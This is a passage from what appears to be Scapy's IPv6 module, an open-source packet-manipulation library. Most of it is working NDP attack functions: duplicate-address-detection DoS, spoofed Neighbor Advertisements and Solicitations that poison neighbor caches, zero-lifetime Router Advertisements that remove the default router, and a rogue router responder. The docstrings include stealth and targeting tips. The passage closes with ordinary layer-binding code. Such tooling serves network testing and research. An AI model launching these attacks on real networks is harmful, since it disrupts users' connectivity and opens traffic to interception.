3635 - as IPv6 source address: the unspecified address (::).
3636 - as IPv6 destination address: the link-local solicited-node multicast
3637 address derived from the target address in received NS.
3638 - the mac address of the interface as source (or reply_mac, see below).
3639 - the multicast mac address derived from the solicited node multicast
3640 address used as IPv6 destination address.
3641
3642 Following arguments can be used to change the behavior:
3643
3644 iface: a specific interface (e.g. "eth0") of the system on which the
3645 DoS should be launched. If None is provided conf.iface is used.
3646
3647 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
3648 Only NS messages received from this source will trigger replies.
3649 This allows limiting the effects of the DoS to a single target by
3650 filtering on its mac address. The default value is None: the DoS
3651 is not limited to a specific mac address.
3652
3653 tgt_filter: Same as previous but for a specific target IPv6 address for
3654 received NS. If the target address in the NS message (not the IPv6
3655 destination address) matches that address, then a fake reply will
3656 be sent, i.e. the emitter will be a target of the DoS.
3657
3658 reply_mac: allow specifying a specific source mac address for the reply,
3659 i.e. to prevent the use of the mac address of the interface.
3660 """
3661
3662 def ns_reply_callback(req, reply_mac, iface):
3663 """
3664 Callback that reply to a NS by sending a similar NS
3665 """
3666
3667 # Let's build a reply and send it
3668 mac = req[Ether].src
3669 dst = req[IPv6].dst
3670 tgt = req[ICMPv6ND_NS].tgt
3671 rep = Ether(src=reply_mac) / IPv6(src="::", dst=dst) / ICMPv6ND_NS(tgt=tgt) # noqa: E501
3672 sendp(rep, iface=iface, verbose=0)
3673
3674 print("Reply NS for target address %s (received from %s)" % (tgt, mac))
3675
3676 _NDP_Attack_DAD_DoS(ns_reply_callback, iface, mac_src_filter,
3677 tgt_filter, reply_mac)
3678
3679
3680def NDP_Attack_DAD_DoS_via_NA(iface=None, mac_src_filter=None, tgt_filter=None,
3681 reply_mac=None):
3682 """
3683 Perform the DAD DoS attack using NS described in section 4.1.3 of RFC
3684 3756. This is done by listening incoming NS messages *sent from the
3685 unspecified address* and sending a NA reply for the target address,
3686 leading the peer to believe that another node is also performing DAD
3687 for that address.
3688
3689 By default, the fake NA sent to create the DoS uses:
3690 - as target address the target address found in received NS.
3691 - as IPv6 source address: the target address found in received NS.
3692 - as IPv6 destination address: the link-local solicited-node multicast
3693 address derived from the target address in received NS.
3694 - the mac address of the interface as source (or reply_mac, see below).
3695 - the multicast mac address derived from the solicited node multicast
3696 address used as IPv6 destination address.
3697 - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr) filled
3698 with the mac address used as source of the NA.
3699
3700 Following arguments can be used to change the behavior:
3701
3702 iface: a specific interface (e.g. "eth0") of the system on which the
3703 DoS should be launched. If None is provided conf.iface is used.
3704
3705 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
3706 Only NS messages received from this source will trigger replies.
3707 This allows limiting the effects of the DoS to a single target by
3708 filtering on its mac address. The default value is None: the DoS
3709 is not limited to a specific mac address.
3710
3711 tgt_filter: Same as previous but for a specific target IPv6 address for
3712 received NS. If the target address in the NS message (not the IPv6
3713 destination address) matches that address, then a fake reply will
3714 be sent, i.e. the emitter will be a target of the DoS.
3715
3716 reply_mac: allow specifying a specific source mac address for the reply,
3717 i.e. to prevent the use of the mac address of the interface. This
3718 address will also be used in the Target Link-Layer Address option.
3719 """
3720
3721 def na_reply_callback(req, reply_mac, iface):
3722 """
3723 Callback that reply to a NS with a NA
3724 """
3725
3726 # Let's build a reply and send it
3727 mac = req[Ether].src
3728 dst = req[IPv6].dst
3729 tgt = req[ICMPv6ND_NS].tgt
3730 rep = Ether(src=reply_mac) / IPv6(src=tgt, dst=dst)
3731 rep /= ICMPv6ND_NA(tgt=tgt, S=0, R=0, O=1) # noqa: E741
3732 rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac)
3733 sendp(rep, iface=iface, verbose=0)
3734
3735 print("Reply NA for target address %s (received from %s)" % (tgt, mac))
3736
3737 _NDP_Attack_DAD_DoS(na_reply_callback, iface, mac_src_filter,
3738 tgt_filter, reply_mac)
3739
3740
3741def NDP_Attack_NA_Spoofing(iface=None, mac_src_filter=None, tgt_filter=None,
3742 reply_mac=None, router=False):
3743 """
3744 The main purpose of this function is to send fake Neighbor Advertisement
3745 messages to a victim. As the emission of unsolicited Neighbor Advertisement
3746 is pretty pointless (from an attacker standpoint) because it will not
3747 lead to a modification of a victim's neighbor cache, the function send
3748 advertisements in response to received NS (NS sent as part of the DAD,
3749 i.e. with an unspecified address as source, are not considered).
3750
3751 By default, the fake NA sent to create the DoS uses:
3752 - as target address the target address found in received NS.
3753 - as IPv6 source address: the target address
3754 - as IPv6 destination address: the source IPv6 address of received NS
3755 message.
3756 - the mac address of the interface as source (or reply_mac, see below).
3757 - the source mac address of the received NS as destination macs address
3758 of the emitted NA.
3759 - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr)
3760 filled with the mac address used as source of the NA.
3761
3762 Following arguments can be used to change the behavior:
3763
3764 iface: a specific interface (e.g. "eth0") of the system on which the
3765 DoS should be launched. If None is provided conf.iface is used.
3766
3767 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
3768 Only NS messages received from this source will trigger replies.
3769 This allows limiting the effects of the DoS to a single target by
3770 filtering on its mac address. The default value is None: the DoS
3771 is not limited to a specific mac address.
3772
3773 tgt_filter: Same as previous but for a specific target IPv6 address for
3774 received NS. If the target address in the NS message (not the IPv6
3775 destination address) matches that address, then a fake reply will
3776 be sent, i.e. the emitter will be a target of the DoS.
3777
3778 reply_mac: allow specifying a specific source mac address for the reply,
3779 i.e. to prevent the use of the mac address of the interface. This
3780 address will also be used in the Target Link-Layer Address option.
3781
3782 router: by the default (False) the 'R' flag in the NA used for the reply
3783 is not set. If the parameter is set to True, the 'R' flag in the
3784 NA is set, advertising us as a router.
3785
3786 Please, keep the following in mind when using the function: for obvious
3787 reasons (kernel space vs. Python speed), when the target of the address
3788 resolution is on the link, the sender of the NS receives 2 NA messages
3789 in a row, the valid one and our fake one. The second one will overwrite
3790 the information provided by the first one, i.e. the natural latency of
3791 Scapy helps here.
3792
3793 In practice, on a common Ethernet link, the emission of the NA from the
3794 genuine target (kernel stack) usually occurs in the same millisecond as
3795 the receipt of the NS. The NA generated by Scapy6 will usually come after
3796 something 20+ ms. On a usual testbed for instance, this difference is
3797 sufficient to have the first data packet sent from the victim to the
3798 destination before it even receives our fake NA.
3799 """
3800
3801 def is_request(req, mac_src_filter, tgt_filter):
3802 """
3803 Check if packet req is a request
3804 """
3805
3806 # Those simple checks are based on Section 5.4.2 of RFC 4862
3807 if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req):
3808 return 0
3809
3810 mac_src = req[Ether].src
3811 if mac_src_filter and mac_src != mac_src_filter:
3812 return 0
3813
3814 # Source must NOT be the unspecified address
3815 if req[IPv6].src == "::":
3816 return 0
3817
3818 tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt)
3819 if tgt_filter and tgt != tgt_filter:
3820 return 0
3821
3822 dst = req[IPv6].dst
3823 if in6_isllsnmaddr(dst): # Address is Link Layer Solicited Node mcast.
3824
3825 # If this is a real address resolution NS, then the destination
3826 # address of the packet is the link-local solicited node multicast
3827 # address associated with the target of the NS.
3828 # Otherwise, the NS is a NUD related one, i.e. the peer is
3829 # unicasting the NS to check the target is still alive (L2
3830 # information is still in its cache and it is verified)
3831 received_snma = inet_pton(socket.AF_INET6, dst)
3832 expected_snma = in6_getnsma(tgt)
3833 if received_snma != expected_snma:
3834 print("solicited node multicast @ does not match target @!")
3835 return 0
3836
3837 return 1
3838
3839 def reply_callback(req, reply_mac, router, iface):
3840 """
3841 Callback that reply to a NS with a spoofed NA
3842 """
3843
3844 # Let's build a reply (as defined in Section 7.2.4. of RFC 4861) and
3845 # send it back.
3846 mac = req[Ether].src
3847 pkt = req[IPv6]
3848 src = pkt.src
3849 tgt = req[ICMPv6ND_NS].tgt
3850 rep = Ether(src=reply_mac, dst=mac) / IPv6(src=tgt, dst=src)
3851 # Use the target field from the NS
3852 rep /= ICMPv6ND_NA(tgt=tgt, S=1, R=router, O=1) # noqa: E741
3853
3854 # "If the solicitation IP Destination Address is not a multicast
3855 # address, the Target Link-Layer Address option MAY be omitted"
3856 # Given our purpose, we always include it.
3857 rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac)
3858
3859 sendp(rep, iface=iface, verbose=0)
3860
3861 print("Reply NA for target address %s (received from %s)" % (tgt, mac))
3862
3863 if not iface:
3864 iface = conf.iface
3865 # To prevent sniffing our own traffic
3866 if not reply_mac:
3867 reply_mac = get_if_hwaddr(iface)
3868 sniff_filter = "icmp6 and not ether src %s" % reply_mac
3869
3870 router = 1 if router else 0 # Value of the R flags in NA
3871
3872 sniff(store=0,
3873 filter=sniff_filter,
3874 lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter),
3875 prn=lambda x: reply_callback(x, reply_mac, router, iface),
3876 iface=iface)
3877
3878
3879def NDP_Attack_NS_Spoofing(src_lladdr=None, src=None, target="2001:db8::1",
3880 dst=None, src_mac=None, dst_mac=None, loop=True,
3881 inter=1, iface=None):
3882 """
3883 The main purpose of this function is to send fake Neighbor Solicitations
3884 messages to a victim, in order to either create a new entry in its neighbor
3885 cache or update an existing one. In section 7.2.3 of RFC 4861, it is stated
3886 that a node SHOULD create the entry or update an existing one (if it is not
3887 currently performing DAD for the target of the NS). The entry's reachability # noqa: E501
3888 state is set to STALE.
3889
3890 The two main parameters of the function are the source link-layer address
3891 (carried by the Source Link-Layer Address option in the NS) and the
3892 source address of the packet.
3893
3894 Unlike some other NDP_Attack_* function, this one is not based on a
3895 stimulus/response model. When called, it sends the same NS packet in loop
3896 every second (the default)
3897
3898 Following arguments can be used to change the format of the packets:
3899
3900 src_lladdr: the MAC address used in the Source Link-Layer Address option
3901 included in the NS packet. This is the address that the peer should
3902 associate in its neighbor cache with the IPv6 source address of the
3903 packet. If None is provided, the mac address of the interface is
3904 used.
3905
3906 src: the IPv6 address used as source of the packet. If None is provided,
3907 an address associated with the emitting interface will be used
3908 (based on the destination address of the packet).
3909
3910 target: the target address of the NS packet. If no value is provided,
3911 a dummy address (2001:db8::1) is used. The value of the target
3912 has a direct impact on the destination address of the packet if it
3913 is not overridden. By default, the solicited-node multicast address
3914 associated with the target is used as destination address of the
3915 packet. Consider specifying a specific destination address if you
3916 intend to use a target address different than the one of the victim.
3917
3918 dst: The destination address of the NS. By default, the solicited node
3919 multicast address associated with the target address (see previous
3920 parameter) is used if no specific value is provided. The victim
3921 is not expected to check the destination address of the packet,
3922 so using a multicast address like ff02::1 should work if you want
3923 the attack to target all hosts on the link. On the contrary, if
3924 you want to be more stealth, you should provide the target address
3925 for this parameter in order for the packet to be sent only to the
3926 victim.
3927
3928 src_mac: the MAC address used as source of the packet. By default, this
3929 is the address of the interface. If you want to be more stealth,
3930 feel free to use something else. Note that this address is not the
3931 that the victim will use to populate its neighbor cache.
3932
3933 dst_mac: The MAC address used as destination address of the packet. If
3934 the IPv6 destination address is multicast (all-nodes, solicited
3935 node, ...), it will be computed. If the destination address is
3936 unicast, a neighbor solicitation will be performed to get the
3937 associated address. If you want the attack to be stealth, you
3938 can provide the MAC address using this parameter.
3939
3940 loop: By default, this parameter is True, indicating that NS packets
3941 will be sent in loop, separated by 'inter' seconds (see below).
3942 When set to False, a single packet is sent.
3943
3944 inter: When loop parameter is True (the default), this parameter provides
3945 the interval in seconds used for sending NS packets.
3946
3947 iface: to force the sending interface.
3948 """
3949
3950 if not iface:
3951 iface = conf.iface
3952
3953 # Use provided MAC address as source link-layer address option
3954 # or the MAC address of the interface if none is provided.
3955 if not src_lladdr:
3956 src_lladdr = get_if_hwaddr(iface)
3957
3958 # Prepare packets parameters
3959 ether_params = {}
3960 if src_mac:
3961 ether_params["src"] = src_mac
3962
3963 if dst_mac:
3964 ether_params["dst"] = dst_mac
3965
3966 ipv6_params = {}
3967 if src:
3968 ipv6_params["src"] = src
3969 if dst:
3970 ipv6_params["dst"] = dst
3971 else:
3972 # Compute the solicited-node multicast address
3973 # associated with the target address.
3974 tmp = inet_ntop(socket.AF_INET6,
3975 in6_getnsma(inet_pton(socket.AF_INET6, target)))
3976 ipv6_params["dst"] = tmp
3977
3978 pkt = Ether(**ether_params)
3979 pkt /= IPv6(**ipv6_params)
3980 pkt /= ICMPv6ND_NS(tgt=target)
3981 pkt /= ICMPv6NDOptSrcLLAddr(lladdr=src_lladdr)
3982
3983 sendp(pkt, inter=inter, loop=loop, iface=iface, verbose=0)
3984
3985
3986def NDP_Attack_Kill_Default_Router(iface=None, mac_src_filter=None,
3987 ip_src_filter=None, reply_mac=None,
3988 tgt_mac=None):
3989 """
3990 The purpose of the function is to monitor incoming RA messages
3991 sent by default routers (RA with a non-zero Router Lifetime values)
3992 and invalidate them by immediately replying with fake RA messages
3993 advertising a zero Router Lifetime value.
3994
3995 The result on receivers is that the router is immediately invalidated,
3996 i.e. the associated entry is discarded from the default router list
3997 and destination cache is updated to reflect the change.
3998
3999 By default, the function considers all RA messages with a non-zero
4000 Router Lifetime value but provides configuration knobs to allow
4001 filtering RA sent by specific routers (Ethernet source address).
4002 With regard to emission, the multicast all-nodes address is used
4003 by default but a specific target can be used, in order for the DoS to
4004 apply only to a specific host.
4005
4006 More precisely, following arguments can be used to change the behavior:
4007
4008 iface: a specific interface (e.g. "eth0") of the system on which the
4009 DoS should be launched. If None is provided conf.iface is used.
4010
4011 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
4012 Only RA messages received from this source will trigger replies.
4013 If other default routers advertised their presence on the link,
4014 their clients will not be impacted by the attack. The default
4015 value is None: the DoS is not limited to a specific mac address.
4016
4017 ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter
4018 on. Only RA messages received from this source address will trigger
4019 replies. If other default routers advertised their presence on the
4020 link, their clients will not be impacted by the attack. The default
4021 value is None: the DoS is not limited to a specific IPv6 source
4022 address.
4023
4024 reply_mac: allow specifying a specific source mac address for the reply,
4025 i.e. to prevent the use of the mac address of the interface.
4026
4027 tgt_mac: allow limiting the effect of the DoS to a specific host,
4028 by sending the "invalidating RA" only to its mac address.
4029 """
4030
4031 def is_request(req, mac_src_filter, ip_src_filter):
4032 """
4033 Check if packet req is a request
4034 """
4035
4036 if not (Ether in req and IPv6 in req and ICMPv6ND_RA in req):
4037 return 0
4038
4039 mac_src = req[Ether].src
4040 if mac_src_filter and mac_src != mac_src_filter:
4041 return 0
4042
4043 ip_src = req[IPv6].src
4044 if ip_src_filter and ip_src != ip_src_filter:
4045 return 0
4046
4047 # Check if this is an advertisement for a Default Router
4048 # by looking at Router Lifetime value
4049 if req[ICMPv6ND_RA].routerlifetime == 0:
4050 return 0
4051
4052 return 1
4053
4054 def ra_reply_callback(req, reply_mac, tgt_mac, iface):
4055 """
4056 Callback that sends an RA with a 0 lifetime
4057 """
4058
4059 # Let's build a reply and send it
4060
4061 src = req[IPv6].src
4062
4063 # Prepare packets parameters
4064 ether_params = {}
4065 if reply_mac:
4066 ether_params["src"] = reply_mac
4067
4068 if tgt_mac:
4069 ether_params["dst"] = tgt_mac
4070
4071 # Basis of fake RA (high pref, zero lifetime)
4072 rep = Ether(**ether_params) / IPv6(src=src, dst="ff02::1")
4073 rep /= ICMPv6ND_RA(prf=1, routerlifetime=0)
4074
4075 # Add it a PIO from the request ...
4076 tmp = req
4077 while ICMPv6NDOptPrefixInfo in tmp:
4078 pio = tmp[ICMPv6NDOptPrefixInfo]
4079 tmp = pio.payload
4080 del pio.payload
4081 rep /= pio
4082
4083 # ... and source link layer address option
4084 if ICMPv6NDOptSrcLLAddr in req:
4085 mac = req[ICMPv6NDOptSrcLLAddr].lladdr
4086 else:
4087 mac = req[Ether].src
4088 rep /= ICMPv6NDOptSrcLLAddr(lladdr=mac)
4089
4090 sendp(rep, iface=iface, verbose=0)
4091
4092 print("Fake RA sent with source address %s" % src)
4093
4094 if not iface:
4095 iface = conf.iface
4096 # To prevent sniffing our own traffic
4097 if not reply_mac:
4098 reply_mac = get_if_hwaddr(iface)
4099 sniff_filter = "icmp6 and not ether src %s" % reply_mac
4100
4101 sniff(store=0,
4102 filter=sniff_filter,
4103 lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter),
4104 prn=lambda x: ra_reply_callback(x, reply_mac, tgt_mac, iface),
4105 iface=iface)
4106
4107
4108def NDP_Attack_Fake_Router(ra, iface=None, mac_src_filter=None,
4109 ip_src_filter=None):
4110 """
4111 The purpose of this function is to send provided RA message at layer 2
4112 (i.e. providing a packet starting with IPv6 will not work) in response
4113 to received RS messages. In the end, the function is a simple wrapper
4114 around sendp() that monitor the link for RS messages.
4115
4116 It is probably better explained with an example:
4117
4118 >>> ra = Ether()/IPv6()/ICMPv6ND_RA()
4119 >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:1::", prefixlen=64)
4120 >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:2::", prefixlen=64)
4121 >>> ra /= ICMPv6NDOptSrcLLAddr(lladdr="00:11:22:33:44:55")
4122 >>> NDP_Attack_Fake_Router(ra, iface="eth0")
4123 Fake RA sent in response to RS from fe80::213:58ff:fe8c:b573
4124 Fake RA sent in response to RS from fe80::213:72ff:fe8c:b9ae
4125 ...
4126
4127 Following arguments can be used to change the behavior:
4128
4129 ra: the RA message to send in response to received RS message.
4130
4131 iface: a specific interface (e.g. "eth0") of the system on which the
4132 DoS should be launched. If none is provided, conf.iface is
4133 used.
4134
4135 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
4136 Only RS messages received from this source will trigger a reply.
4137 Note that no changes to provided RA is done which imply that if
4138 you intend to target only the source of the RS using this option,
4139 you will have to set the Ethernet destination address to the same
4140 value in your RA.
4141 The default value for this parameter is None: no filtering on the
4142 source of RS is done.
4143
4144 ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter
4145 on. Only RS messages received from this source address will trigger
4146 replies. Same comment as for previous argument apply: if you use
4147 the option, you will probably want to set a specific Ethernet
4148 destination address in the RA.
4149 """
4150
4151 def is_request(req, mac_src_filter, ip_src_filter):
4152 """
4153 Check if packet req is a request
4154 """
4155
4156 if not (Ether in req and IPv6 in req and ICMPv6ND_RS in req):
4157 return 0
4158
4159 mac_src = req[Ether].src
4160 if mac_src_filter and mac_src != mac_src_filter:
4161 return 0
4162
4163 ip_src = req[IPv6].src
4164 if ip_src_filter and ip_src != ip_src_filter:
4165 return 0
4166
4167 return 1
4168
4169 def ra_reply_callback(req, iface):
4170 """
4171 Callback that sends an RA in reply to an RS
4172 """
4173
4174 src = req[IPv6].src
4175 sendp(ra, iface=iface, verbose=0)
4176 print("Fake RA sent in response to RS from %s" % src)
4177
4178 if not iface:
4179 iface = conf.iface
4180 sniff_filter = "icmp6"
4181
4182 sniff(store=0,
4183 filter=sniff_filter,
4184 lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter),
4185 prn=lambda x: ra_reply_callback(x, iface),
4186 iface=iface)
4187
4188#############################################################################
4189# Pre-load classes ##
4190#############################################################################
4191
4192
4193def _get_cls(name):
4194 return globals().get(name, Raw)
4195
4196
4197def _load_dict(d):
4198 for k, v in d.items():
4199 d[k] = _get_cls(v)
4200
4201
4202_load_dict(icmp6ndoptscls)
4203_load_dict(icmp6typescls)
4204_load_dict(ipv6nhcls)
4205
4206#############################################################################
4207#############################################################################
4208# Layers binding #
4209#############################################################################
4210#############################################################################
4211
4212conf.l3types.register(ETH_P_IPV6, IPv6)
4213conf.l3types.register_num2layer(ETH_P_ALL, IPv46)
4214conf.l2types.register(31, IPv6)
4215conf.l2types.register(DLT_IPV6, IPv6)
4216conf.l2types.register(DLT_RAW, IPv46)
4217conf.l2types.register_num2layer(DLT_RAW_ALT, IPv46)
4218
4219bind_layers(Ether, IPv6, type=0x86dd)
4220bind_layers(CookedLinux, IPv6, proto=0x86dd)
4221bind_layers(GRE, IPv6, proto=0x86dd)
4222bind_layers(SNAP, IPv6, code=0x86dd)
4223# AF_INET6 values are platform-dependent. For a detailed explaination, read
4224# https://github.com/the-tcpdump-group/libpcap/blob/f98637ad7f086a34c4027339c9639ae1ef842df3/gencode.c#L3333-L3354 # noqa: E501
4225if WINDOWS:
4226 bind_layers(Loopback, IPv6, type=0x18)
4227else:
4228 bind_layers(Loopback, IPv6, type=socket.AF_INET6)
4229bind_layers(IPerror6, TCPerror, nh=socket.IPPROTO_TCP)
4230bind_layers(IPerror6, UDPerror, nh=socket.IPPROTO_UDP)
4231bind_layers(IPv6, TCP, nh=socket.IPPROTO_TCP)
4232bind_layers(IPv6, UDP, nh=socket.IPPROTO_UDP)
4233bind_layers(IP, IPv6, proto=socket.IPPROTO_IPV6)
4234bind_layers(IPv6, IPv6, nh=socket.IPPROTO_IPV6)
4235bind_layers(IPv6, IP, nh=socket.IPPROTO_IPIP)
4236bind_layers(IPv6, GRE, nh=socket.IPPROTO_GRE)